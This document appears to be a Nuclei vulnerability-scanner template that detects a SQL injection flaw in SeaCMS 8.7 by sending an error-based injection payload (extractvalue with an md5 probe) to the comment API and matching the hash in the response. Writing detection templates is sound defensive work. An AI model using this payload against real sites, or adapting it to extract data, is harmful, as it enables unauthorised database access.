id: seacms-sqli

info:
  name: SeaCMS 8.7 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: SeaCMS 8.7 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://www.uedbox.com/post/54561/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-89
  metadata:
    max-request: 1
  tags: seacms,sqli
variables:
  num: "999999999"

http:
  - method: GET
    path:
      - "{{BaseURL}}/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5({{num}})))),@`%27`"

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5({{num}})}}'

      - type: status
        status:
          - 200

# digest: 4a0a004730450221008787275f6a42e0d0a7a6a933e75c169456e51bb9d9042f5249fd4297f94d06bb0220235eb517464b0885eb44dfccc39d7c882c15932f00acf07b8c2abaa91bea0ab3:922c64590222798bb761d5b6d8e72950
